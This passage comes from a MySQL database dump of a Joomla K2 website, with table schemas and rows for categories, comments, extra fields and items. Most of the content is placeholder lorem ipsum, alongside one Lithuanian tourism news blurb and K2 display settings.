  KEY `category` (`published`,`access`,`trash`),
  KEY `parent` (`parent`),
  KEY `ordering` (`ordering`),
  KEY `published` (`published`),
  KEY `access` (`access`),
  KEY `trash` (`trash`),
  KEY `language` (`language`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_categories`
--

LOCK TABLES `xyhmu_k2_categories` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_categories` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_categories` VALUES (1,'Latest News','latest-news','<p>VšĮ ,,Tytuvėnų piligrimų centras\'\' vasario 7-9 d. pristatatė Kelmės kraštą, pagrindinius lankytinus objektus, turistinius ir piligriminius maršrutus Rygoje vykusioje tarptautinėje turizmo parodoje Balttour\'25. Stendo lankytojai domėjosi lankytinais objektais, dalyvavo loterijoje.</p>',0,0,1,1,2,'1.jpg','{\"inheritFrom\":\"0\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\"}',0,'','*'),(2,'Upcoming Events','upcoming-events','',0,0,1,1,1,'','{\"inheritFrom\":\"0\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\"}',0,'','*'),(3,'Events','events','',0,1,1,1,3,'','{\"inheritFrom\":\"0\",\"theme\":\"events\",\"num_leading_items\":\"4\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"0\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"0\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"0\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"0\",\"catDescription\":\"0\",\"catImage\":\"0\",\"catFeedLink\":\"0\",\"catFeedIcon\":\"0\",\"subCategories\":\"1\",\"subCatColumns\":\"1\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"0\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"0\",\"catItemIntroText\":\"0\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"1\",\"catItemHits\":\"0\",\"catItemCategory\":\"0\",\"catItemTags\":\"0\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"0\",\"catItemCommentsAnchor\":\"0\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"0\",\"itemFontResizer\":\"0\",\"itemPrintButton\":\"0\",\"itemEmailButton\":\"0\",\"itemSocialButton\":\"0\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"0\",\"itemRating\":\"0\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"0\",\"itemHits\":\"0\",\"itemCategory\":\"0\",\"itemTags\":\"0\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemNavigation\":\"1\",\"itemComments\":\"0\",\"itemTwitterButton\":\"0\",\"itemFacebookButton\":\"0\",\"itemGooglePlusOneButton\":\"0\",\"itemAuthorBlock\":\"0\",\"itemAuthorImage\":\"0\",\"itemAuthorDescription\":\"0\",\"itemAuthorURL\":\"0\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"0\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"0\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"0\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\"}',0,'','*'),(4,'Courses','course','',0,0,1,1,4,'','{\"inheritFrom\":\"0\",\"theme\":\"\",\"num_leading_items\":\"2\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"4\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"4\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"4\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"1\",\"catDescription\":\"1\",\"catImage\":\"1\",\"catFeedLink\":\"1\",\"catFeedIcon\":\"1\",\"subCategories\":\"1\",\"subCatColumns\":\"2\",\"subCatOrdering\":\"\",\"subCatTitle\":\"1\",\"subCatTitleItemCounter\":\"1\",\"subCatDescription\":\"1\",\"subCatImage\":\"1\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"1\",\"catItemTags\":\"1\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"1\",\"itemPrintButton\":\"1\",\"itemEmailButton\":\"1\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"1\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemNavigation\":\"1\",\"itemComments\":\"1\",\"itemTwitterButton\":\"1\",\"itemFacebookButton\":\"1\",\"itemGooglePlusOneButton\":\"1\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"1\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\"}',1,'','*'),(5,'Blog','blog','',0,0,1,1,4,'','{\"inheritFrom\":\"0\",\"theme\":\"\",\"num_leading_items\":\"3\",\"num_leading_columns\":\"1\",\"leadingImgSize\":\"Large\",\"num_primary_items\":\"0\",\"num_primary_columns\":\"2\",\"primaryImgSize\":\"Medium\",\"num_secondary_items\":\"0\",\"num_secondary_columns\":\"1\",\"secondaryImgSize\":\"Small\",\"num_links\":\"0\",\"num_links_columns\":\"1\",\"linksImgSize\":\"XSmall\",\"catCatalogMode\":\"0\",\"catFeaturedItems\":\"1\",\"catOrdering\":\"\",\"catPagination\":\"2\",\"catPaginationResults\":\"1\",\"catTitle\":\"1\",\"catTitleItemCounter\":\"0\",\"catDescription\":\"0\",\"catImage\":\"0\",\"catFeedLink\":\"0\",\"catFeedIcon\":\"0\",\"subCategories\":\"0\",\"subCatColumns\":\"1\",\"subCatOrdering\":\"\",\"subCatTitle\":\"0\",\"subCatTitleItemCounter\":\"0\",\"subCatDescription\":\"0\",\"subCatImage\":\"0\",\"itemImageXS\":\"\",\"itemImageS\":\"\",\"itemImageM\":\"\",\"itemImageL\":\"\",\"itemImageXL\":\"\",\"catItemTitle\":\"1\",\"catItemTitleLinked\":\"1\",\"catItemFeaturedNotice\":\"0\",\"catItemAuthor\":\"1\",\"catItemDateCreated\":\"1\",\"catItemRating\":\"0\",\"catItemImage\":\"1\",\"catItemIntroText\":\"1\",\"catItemIntroTextWordLimit\":\"30\",\"catItemExtraFields\":\"0\",\"catItemHits\":\"0\",\"catItemCategory\":\"0\",\"catItemTags\":\"0\",\"catItemAttachments\":\"0\",\"catItemAttachmentsCounter\":\"0\",\"catItemVideo\":\"0\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"0\",\"catItemImageGallery\":\"0\",\"catItemDateModified\":\"0\",\"catItemReadMore\":\"1\",\"catItemCommentsAnchor\":\"1\",\"catItemK2Plugins\":\"1\",\"itemDateCreated\":\"1\",\"itemTitle\":\"1\",\"itemFeaturedNotice\":\"1\",\"itemAuthor\":\"1\",\"itemFontResizer\":\"0\",\"itemPrintButton\":\"0\",\"itemEmailButton\":\"0\",\"itemSocialButton\":\"1\",\"itemVideoAnchor\":\"1\",\"itemImageGalleryAnchor\":\"1\",\"itemCommentsAnchor\":\"1\",\"itemRating\":\"1\",\"itemImage\":\"1\",\"itemImgSize\":\"Large\",\"itemImageMainCaption\":\"1\",\"itemImageMainCredits\":\"1\",\"itemIntroText\":\"1\",\"itemFullText\":\"1\",\"itemExtraFields\":\"1\",\"itemDateModified\":\"0\",\"itemHits\":\"1\",\"itemCategory\":\"1\",\"itemTags\":\"1\",\"itemAttachments\":\"1\",\"itemAttachmentsCounter\":\"1\",\"itemVideo\":\"1\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"0\",\"itemVideoCaption\":\"1\",\"itemVideoCredits\":\"1\",\"itemImageGallery\":\"1\",\"itemNavigation\":\"0\",\"itemComments\":\"1\",\"itemTwitterButton\":\"0\",\"itemFacebookButton\":\"0\",\"itemGooglePlusOneButton\":\"0\",\"itemAuthorBlock\":\"1\",\"itemAuthorImage\":\"1\",\"itemAuthorDescription\":\"1\",\"itemAuthorURL\":\"1\",\"itemAuthorEmail\":\"0\",\"itemAuthorLatest\":\"0\",\"itemAuthorLatestLimit\":\"5\",\"itemRelated\":\"1\",\"itemRelatedLimit\":\"5\",\"itemRelatedTitle\":\"1\",\"itemRelatedCategory\":\"0\",\"itemRelatedImageSize\":\"0\",\"itemRelatedIntrotext\":\"0\",\"itemRelatedFulltext\":\"0\",\"itemRelatedAuthor\":\"0\",\"itemRelatedMedia\":\"0\",\"itemRelatedImageGallery\":\"0\",\"itemK2Plugins\":\"1\",\"catMetaDesc\":\"\",\"catMetaKey\":\"\",\"catMetaRobots\":\"\",\"catMetaAuthor\":\"\"}',0,'','*');
/*!40000 ALTER TABLE `xyhmu_k2_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_comments`
--

DROP TABLE IF EXISTS `xyhmu_k2_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_comments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `itemID` int(11) NOT NULL,
  `userID` int(11) NOT NULL,
  `userName` varchar(255) NOT NULL,
  `commentDate` datetime NOT NULL,
  `commentText` text NOT NULL,
  `commentEmail` varchar(255) NOT NULL,
  `commentURL` varchar(255) NOT NULL,
  `published` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `itemID` (`itemID`),
  KEY `userID` (`userID`),
  KEY `published` (`published`),
  KEY `latestComments` (`published`,`commentDate`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_comments`
--

LOCK TABLES `xyhmu_k2_comments` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_comments` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_comments` VALUES (1,24,0,'Sohan','2013-09-30 09:05:09','Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet.','sohanzakaria@gmail.com','',1),(3,23,0,'Riyadh','2013-09-30 11:28:43','Lorem ipsum dolor sit amet, consectetuer adipiscing elit.','j.riyadh08@gmail.com','',1);
/*!40000 ALTER TABLE `xyhmu_k2_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_extra_fields`
--

DROP TABLE IF EXISTS `xyhmu_k2_extra_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_extra_fields` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `value` text NOT NULL,
  `type` varchar(255) NOT NULL,
  `group` int(11) NOT NULL,
  `published` tinyint(4) NOT NULL,
  `ordering` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `group` (`group`),
  KEY `published` (`published`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_extra_fields`
--

LOCK TABLES `xyhmu_k2_extra_fields` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_extra_fields` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_extra_fields` VALUES (1,'Time','[{\"name\":null,\"value\":\"3.00PM to 6.00PM\",\"target\":null,\"alias\":\"time\",\"required\":1,\"showNull\":0}]','textfield',1,1,1),(2,'Gate Open','[{\"name\":null,\"value\":\"2.00PM\",\"target\":null,\"alias\":\"gateopen\",\"required\":1,\"showNull\":0}]','textfield',1,1,2),(3,'Location','[{\"name\":null,\"value\":\"\",\"target\":null,\"alias\":\"location\",\"required\":1,\"showNull\":0}]','textfield',1,1,3);
/*!40000 ALTER TABLE `xyhmu_k2_extra_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_extra_fields_groups`
--

DROP TABLE IF EXISTS `xyhmu_k2_extra_fields_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_extra_fields_groups` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_extra_fields_groups`
--

LOCK TABLES `xyhmu_k2_extra_fields_groups` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_extra_fields_groups` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_extra_fields_groups` VALUES (1,'Info');
/*!40000 ALTER TABLE `xyhmu_k2_extra_fields_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_items`
--

DROP TABLE IF EXISTS `xyhmu_k2_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_items` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) DEFAULT NULL,
  `catid` int(11) NOT NULL,
  `published` smallint(6) NOT NULL DEFAULT '0',
  `introtext` mediumtext NOT NULL,
  `fulltext` mediumtext NOT NULL,
  `video` text,
  `gallery` varchar(255) DEFAULT NULL,
  `extra_fields` text CHARACTER SET utf8 COLLATE utf8_unicode_ci,
  `extra_fields_search` text NOT NULL,
  `created` datetime NOT NULL,
  `created_by` int(11) NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL,
  `checked_out` int(10) unsigned NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `modified` datetime NOT NULL,
  `modified_by` int(11) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL,
  `publish_down` datetime NOT NULL,
  `trash` smallint(6) NOT NULL DEFAULT '0',
  `access` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `featured` smallint(6) NOT NULL DEFAULT '0',
  `featured_ordering` int(11) NOT NULL DEFAULT '0',
  `image_caption` text NOT NULL,
  `image_credits` varchar(255) NOT NULL,
  `video_caption` text NOT NULL,
  `video_credits` varchar(255) NOT NULL,
  `hits` int(10) unsigned NOT NULL,
  `params` text NOT NULL,
  `metadesc` text NOT NULL,
  `metadata` text NOT NULL,
  `metakey` text NOT NULL,
  `plugins` text NOT NULL,
  `language` char(7) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `item` (`published`,`publish_up`,`publish_down`,`trash`,`access`),
  KEY `catid` (`catid`),
  KEY `created_by` (`created_by`),
  KEY `ordering` (`ordering`),
  KEY `featured` (`featured`),
  KEY `featured_ordering` (`featured_ordering`),
  KEY `hits` (`hits`),
  KEY `created` (`created`),
  KEY `language` (`language`),
  FULLTEXT KEY `search` (`title`,`introtext`,`fulltext`,`extra_fields_search`,`image_caption`,`image_credits`,`video_caption`,`video_credits`,`metadesc`,`metakey`),
  FULLTEXT KEY `title` (`title`)
) ENGINE=MyISAM AUTO_INCREMENT=27 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_items`
--

LOCK TABLES `xyhmu_k2_items` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_items` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_items` VALUES (1,'Fall Career Fair set for Sept. 25','latest-news-analysis',1,1,'<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis dolore te feugait nulla facilisi.</p>','',NULL,NULL,'[]','','2013-09-24 06:16:44',135,'',0,'0000-00-00 00:00:00','2013-10-07 09:13:57',135,'2013-09-24 06:16:44','0000-00-00 